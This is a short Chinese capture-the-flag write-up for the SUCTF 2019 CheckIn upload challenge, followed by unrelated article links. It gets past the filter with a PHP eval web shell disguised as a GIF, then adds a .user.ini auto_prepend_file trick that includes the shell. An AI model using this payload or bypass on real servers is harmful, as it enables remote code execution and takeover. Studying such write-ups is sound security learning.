[SUCTF 2019]CheckIn1

黑名单过滤后缀'ph',并且白名单image类型要有对应文件头

对<?过滤,改用GIF89a<script language='php'>@eval($_POST['cmd']);</script>,成功把getshell.gif上传上去了

尝试用.htaccess将上传的gif当作php解析,但是失败了

根据这篇文章.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前

可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行

连接蚁剑找到flag

相关推荐
百锦再5 小时前
React编程高级主题:错误处理(Error Handling)
前端·javascript·react.js·前端框架·vue·web·angular
x-cmd2 天前
[250331] Paozhu 发布 1.9.0:C++ Web 框架,比肩脚本语言 | DeaDBeeF 播放器发布 1.10.0
android·linux·开发语言·c++·web·音乐播放器·脚本语言
sszdlbw2 天前
BUUCTF-web刷题篇(6)
web安全·web·buuctf
DarkBule_3 天前
零基础驯服GitHub Pages
css·学习·html·github·html5·web
2501_906801484 天前
BY组态-低代码web可视化组件
前端·物联网·低代码·数学建模·编辑器·web
Sweet_vinegar5 天前
变量1(WEB)
安全·web·ctf·bugku
豆芽8195 天前
基于Web的交互式智能成绩管理系统设计
前端·python·信息可视化·数据分析·交互·web·数据可视化
Logintern096 天前
分享一个Pyside6实现web数据展示界面的效果图
python·学习·web·数据·pyside6
亿.66 天前
[ 春秋云境 ] Initial 仿真场景
web·内网渗透·春秋云镜